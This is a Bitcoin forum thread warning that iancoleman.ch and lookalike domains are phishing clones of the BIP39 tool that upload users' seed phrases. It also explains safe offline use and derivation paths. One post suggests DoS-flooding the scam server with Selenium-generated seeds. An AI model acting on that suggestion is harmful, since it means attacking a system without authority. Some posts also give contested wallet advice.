Bitcoin Forum

Note: Iancoleman.ch is Scam, be carefull

Read this :

---

---

I know this site a couple of months ago, a place to recover and generate a seed. iancoleman.io, just tried some time ago, and download it offline, looks fun to me.

Today I have to try something, but I forgot the domain (didn't bookmark it on my browser), so when I type iancoleman in the box search, that directly on iancoleman.ch, here a picture.

https://iili.io/bYsDg9.md.png (https://freeimage.host/i/bYsDg9)

In this case, I suggest to the developer or any further official to make the announcement if the domain was changed to avoid user accessing phishing.

thank alot

Iancoleman's domain hasn't been changed and I can access the iancoleman.io without any problem.
It's the first time I've heard of the .ch domain and that's probably a fake website created for scamming purposes.

Edit:
I just searched for "iancoleman" on google.
It shows the .ch domain as an advertisement. It's not the first time I see google is promoting scams.

https://i.imgur.com/HjJOyDh.jpg

I don't know if it's a legit or malicious clone of iancoleman.io and it doesn't even matter.
Any seed generation (or related tests) for addresses expected to hold money "currently" or any time in the future should be done with the code/page from GitHub (https://github.com/iancoleman/bip39) in a safe offline environment.

If you feel the website is not a legit clone (I can't tell right now, but I would assume the worse), you can easily add a line in hosts:

If I remember correctly, I have seen the one for Coinomi before. The BIP 39 tool is open source, its source code is available for other developers to see. Instead for people to just let people avoid online attack, they do not direct people to the original site, (https://iancoleman.io/bip39/) but they just copy the source code for their own use which can for their own profit which may even not be legit by introducing malicious code to it to carry out an attack on people that make use of the malicious ones.

Very possible the one you pointed to above is a malicious one, but I am not certain about that, just that people should not use it.

Even it is just best to download the html file (https://github.com/iancoleman/bip39/releases/latest/) and use a text editor to open it on an airgapped device.

The site referenced in the OP indicates that the version of the software is v0.5.2 ,which dates from February 2021(*), whilst the known .io domain displays the current version v0.5.4, which is from October 2021.

I’ve seen another site exactly like the one referenced in the OP, with a deliberately close name (lacking an “e”) to the original one: https[colon]//iancolman[dot]io/
Both are very likely scam sites.

While we’re at it, there’s also a .net version (https[colon]//iancoleman[dot]net/), with a flashier interface, but full of spelling and grammatical mistakes in the explanation. Probably yet another site one should not end up visiting …

(*) See: https://github.com/iancoleman/bip39/releases/

Just a heads up: Install an open-source and reputable ad blocking plugin such as uBlock Origin[1] so you wouldn't be getting those scam advertisements.

---

[1] https://github.com/gorhill/uBlock

I've just had a quick look through the source code for the .ch site, and here is the scam code which is missing from the real .io site, at line 18,466:


Essentially any mnemonic that you generate using this website is first logged to the console and then uploaded to the server.

And I'll repeat myself as I always do whenever someone ends up on a scam site - follow the instructions below to avoid 99.9% of these scams:


OP: I would suggest you edit the topic title and your first post to make it clear to anyone who stumbles across it or finds it via a search engine that the only real iancoleman site is the .io one. Also, it should only be used after you download it from GitHub at https://github.com/iancoleman/bip39 and run it on an offline machine, and never ran via an online site.

I would suggest everyone to stay away from this website, and use only official iancoleman github page that shows only official website is with .io domain.
There is one more suspicious and maybe phishing domain other than .ch, and they are using .net domain with same name.
It could be this is alternative domains but I would be very careful and not use them until I hear something from developer.

Let's check out when this recent domains got registered.
First one with .ch domain was registered in March 2022:


Second one was registered in 2021 and than updated this year.

How likely is it for you not to get two different domain for the same site when you do google search with the keyword [iancoleman]?

Google search with the keyword [iancoleman] doesn't directly to the [.ch] domain if you don't actually fill that domain when your search. So there is a possibility that you ignore the [ad] sign on the left of the site that Google refers to and ignore the original site right below the phishing site.

No domain changes I guess, you just go to the phishing site instead of the original site right below it. So you just have to stay away and warn everyone and report it to google.

Even the original Ian Coleman website is not safe, do not use that website, I import recovery phrase into this website few years ago when I was still using coinomi and later someone moved out tokens worth hundreds of dollars from my wallet, this is the only website Imported my keys into.

If you use the online website, you are right. That's not safe. Even if you enter your seed phrase on iancoleman.io and not a fake website, there's still the chance of getting hacked.
Iancoleman is open source and if you want to use it securely, you should download the source code and run it offline on an air-gapped device.
Take note that any online website and any online wallet (including Coinomi) is unsecure.

so in this case, if {don't know} user try to recovery mnemonic seed using that scam site, that possible a scammer got our detail into the scammer server and was able to steal our cryptocurrency, right?

So, is possible they got if not bip39 seed?,
because that site especially for bip39 seed, when using electrum seed, that different category, maybe not successfully generate the private key and won't able to get the detil?.

If you input the right information of your wallet into the scam BIP39 site, the scammer will able to control your wallet since they have a full detail to access your wallet. It's similar like you input your 12 or 24 seeds on phishing site, this is why most people get scammed since they think they have protect their seeds, but they're careless since they're not aware if they access phishing site.

The best thing is only input any personal information in offline version.

Any seed phrase which is either generated by that site or entered in to the seed phrase box is uploaded to the site's server and therefore accessible by the malicious person behind this site. So yes, the scammer will have your seed phrase and therefore will steal your coins.

There should be no reason to insert an Electrum seed phrase on the Iancoleman site since it will not generate the correct addresses even if it (by chance) passes the checksum,* but you should assume that the scammer behind this site is well aware of the difference between BIP39 seed phrases and Electrum seed phrases, and would also check the seed phrase for any Electrum wallets.

*You can edit the code to make it work with Electrum seed phrases if you desire, but that's not really relevant to this discussion.

Official website is perfectly safe if you use it OFFLINE like you should, but this does not apply for any phishing or hijacked websites.
You can't blame someone else for doing experiments like you did with open source tools like Ian Coleman code and website.
There is even message on bottom saying that you can use this website oflline and simple instructions how to do it.

There are two offline usage. First is to open the site, close it, off your data network and reopen the site, but I think that is not safe enough. Or is it safe? I have preferred the second method which is the use of its source code.

@Outhue, if you want to make use of Iancoleman, or want to make use of a tool that generates seed phrase or private key like, bitaddress, you need to make use of the source code for that on an airgapped device. I still wonder how people will find it convenient for themselves to input their seed phrase or private key on a tool that is online, that is not safe even if you are using it on a reputed site.

The risk is the same as downloading Electrum from electrum.org without verifying the binaries; there's a chance the site is compromised.

The safe way is the following:

• Grab and download the latest release from github.com/iancoleman/bip39/releases (https://github.com/iancoleman/bip39/releases).
• Make sure that the sha256sum result is the same as in the release signed message.
• Import Ian's public key. (https://iancoleman.io/pubkey.txt)
• Verify the release signed message.
• Boot an air-gapped machine with a reviewed Linux distro.
• Load iancoleman/bip39 there.

Even if the website isn't compromised, that's like using electrum on an online device and there's still the chance that your computer is compromised.
The safer method (not the safest) is to save the webpage as a file, move it to an air-gapped device and use it there.

If your computer is virus infected, everything's possible. You might as well download the file, and the malware that runs in the background replaces it with another. You might download Ian's public key, and it switches it to the attacker's public key. You might load github.com, and it returns you a fake replica, with compromised binaries.

Whatever you do, you'll have to somehow acquire Ian's binaries, signatures and public key using a non-airgapped computer. And, as always, there are risks.

Since it POSTs the seed to the attacker's server, you can DoS the server by automatically generating thousands of seeds per second on a fast connection. Just make sure that you use something like Selenium to press the generate button, then clicks on the text box with the seed, and then back to the button again - that should be sure to trigger the attacking code.

Even if it does not take down the website, it will leave the attacker with gigabytes of garbage seed phrases to sift through and might crash whatever database is storing them all, or at least slows it to a crawl. The attacking script is written in PHP after all.

I can't even imagine typing my recovery seed into any so called safe platform of any kind, as far as crypto wallet security is a concern you have to do everything offline, offline only is the way to keep your wallet safe, I made sure that the current wallet I am using will never be imported into any online platform.

Forget iancoleman, why do you need this website anyways? Oh, yes, to get private keys out of recovery seeds, but you don't need to do so this days, newest updates from Trust wallet and other multi coins wallet have given users access to private keys per wallet addresses you created.

STAY AWAY FROM IANCOLEMAN

You can utilize Iancoleman's site offline.

Stay away from Trust wallet, please. For God's sake. It's not open-source, not secure, and neither private. It's one of the worst wallet software to use.

You can try and read previous posts, you do not have to use a online site to do it, just use the html file using a text editor on an airgapped device. This has been repeated many times just on this thread.

He mentioned multi coin wallets also, but almost all the multi coin wallets are close source too. Exodus, Atomic, Coinomi, Coinbase noncustodial and many others are all close source wallets too. Only some hardware wallets are open source which can be gone for if looking for an open source multi coin wallet.

Sure, stay away from phishing Iancoleman (.ch) site.
But for fun and to learn something you have to try this, that tool is very useful for beginner to learn how the seed work and how you create a wallet and address with only one mnemonic. I am sure this tool is as the start of a trust wallet. This tool makes developer think to create a wallet like trust wallet where with 1 seed can create multi-coin wallet.

And how are you going to get your private keys from Trust wallet if you don't type your seed phrase in first, which you've just said you would never do? If I need to enter my seed phrase somewhere to derive my private keys, then 100% of the time I'm going to choose an open source and verifiable tool downloaded from GitHub and ran on an offline machine, such as Iancoleman, over a closed source and unverifiable tool downloaded from an app store, such as Trust wallet.

Iancoleman's site is perfectly legit and perfectly safe if used properly - downloaded, verified, and airgapped. The existence of a malicious version is not a reason not to use it, otherwise you shouldn't be using this forum, your browser, your OS, or pretty much any piece of software at all.

Forget closed source Trust wallet that is used mostly for shitcoins, and stop spreading misinformation to people that official Ian Coleman website is not safe to use.
Phishing websites with different domains mentioned in this topic have nothing to do with real Ian Coleman, and they should never be used.
Unlike Trust wallet, Ian Coleman code is fully open source, you can see what is happening behind the scenes, and you can verify everything.
If done correctly nothing can go wrong and his tools can be very useful to get different derivation Paths and addresses.

Because you mentioned the derivation path, I just curious about is difference BIP 32 and BIP 44, because when I look at the front address is both starts with 1 and also BIP 44 and BIP 141 both is start with 3. I tried that all with one of 24 word mnemonic.

and, why there is no update about taproot bc1p?, where I can find BIP 341 derivation path in iancoleman tool?

BIP32 (https://en.bitcoin.it/wiki/BIP_0032) is the BIP which first described HD wallets and derivation paths. There is no standard BIP32 path, but most wallets which don't use BIP44/49/84 would use either m/0' or m/0'/0'.

BIPs 44/49/84 are the standard derivation paths which most wallets now use. These are m/44'/0'/0' for P2PKH addresses starting with 1, m/49'/0'/0' for P2SH addresses starting with 3, and m/84'/0'/0' for P2WPKH addresses starting with bc1q.

Iancoleman uses the BIP141 tab to allow creation of P2WSH and nested segwit addresses, at arbitrary derivation paths.

The length of the mnemonic phrase is irrelevant when considering the derivation path or address type.

He hasn't implemented it yet.

So if irrelevant, we can generate less than 24 word like 9, or 3 and still get those type address. but, if use only 3 word, can we able to recovery it using bip39 wallet when the wallet only able 12 and 24 word seed?. That look confusing for me, if I tried to generate only with 3 word, I must keep the private key save on other place.

Know that less than 12 word seed phrases are not secure.

Yes

Again, know that less than 12 word seed phrases are not secure.

If you use a reputed wallet, and the wallet is generating 12 word seed phrase by default, that does not mean you can not import 15, 18, 21 or 24 word seed phrase on the wallet. It would be successfully imported.

But if the seed phrase is less than 12 words, likely it would be rejected on reputed wallets as they are designed in a way they can not accept less than 12 word seed phrase. I have tested it on some wallets, like electrum, if less than 12, it would be rejected. Unless you use a tool like Iancolemane for it, but less than 12 words seed phrase is not secure, so why generating it.

Electrum allows you to import a seed phrase with less than 12 words. It would display a message saying checksum is failed, but it generates the wallet with correct addresses successfully.
Electrum even allows you to generate seed phrases including less than 12 words using console tab.

Yes i admit that after i check on bip39 on tab. I also admit if i create random seed, (i mean i create without using iancoleman tool) the wallet still generate with correct address, but i still confused about meaning of failed checksum. Is the wallet will generate different address in future when failed checksum? Or only warn us to carefull where nothing happen with that seed

It will be possible to generate the same addresses in the future. Electrum's source code is public and even if there's some changes in the next updates, it will be still possible to generate the same addresses.
For detecting errors, BIP39 seed phrases include a checksum and you should always use a seed phrase with correct checksum, because it's standard and it's accepted by other wallets as well. I would never recommend using a non-standard seed phrase.

I was close to my mobile device (mobile Electrum) which was what I used to test it, it did not actually work. I used closed source wallet, Trustwallet (not recommended) to test it and it did not work. Normally, it supposed to work, but those wallets are designed for it not to work just for the safety of people.

Because of this (I mean your post), I checked it also on desktop electrum, but it worked, you are not wrong, but it did not work on mobile Electrum.

It depends on how the wallet is designed, and what we need most to keep in mind is not to use any seed phrase that is less than 12 words.

Perhaps I should have said irrelevant within the confines of BIP39, which specifies a seed phrase should be 12/15/18/21/24 words long.

Since the seed phrase is simply used as the input to 2048 rounds of HMAC-SHA512 (alongside a salt), you could use any length of seed phrase you want, with any words, in any language, with an invalid checksum or no checksum at all, and still generate a wallet and addresses. I definitely wouldn't recommend it though, and almost all wallets would refuse to recover from your non-standard seed phrase.

Most wallet software, if you insert a seed phrase which contains an invalid checksum, will simply refuse to proceed, as I've just mentioned. Electrum on the other hand does allow you proceed, albeit with the warning that your checksum is invalid. The same invalid seed phrase will always generate the same addresses when entered in to Electrum, however I would strongly suggest nobody deliberately uses a seed phrase with an invalid checksum.

yes that look bad and dangerous, i tried non-standard seed "nama saya sarah azhari" when i put it on iancoleman tool I got error: nama not in wordlist, did you mean name?, but when put that seed on electrum by check bip39 tab i got the address.
so in this case if checksum failed, is better i just kept the private key than that seed?
and why we have to follow the standard even with non-standard we can still got the private key?

Even if you input any incorrect word and any numbers of words, it also generate the keys and addresses on electrum, but it said many times on this thread that seed phrase that is not up to 12 words should not be used, and also follow the seed phrase generated by default on a reputed wallet. If you are not an expert in the field, let wallet generate the seed phrase for you, or if you know how to use Iancoleman appropriately on an airgapped device.

When the seed phrase is not secure, how would the private key be secure? Not secure. This has been pointed to before, why kind of repeating it to ask question.

Neither. If the checksum failed, it is better that you abandon that seed phrase (and whatever method you used which generated an invalid seed phrase), and create a new valid one via a better method.

Because following the standard is the established, recognizable and proper manner to do something. There are nearly infinite non-standard ways you can generate a seed, or derive private keys in a deterministic process, but following a standard means you have someone to address a problem in case an issue emerges. Also, standard is being reviewed by people who potentially know more than you do, and are more eligible to define the correct process.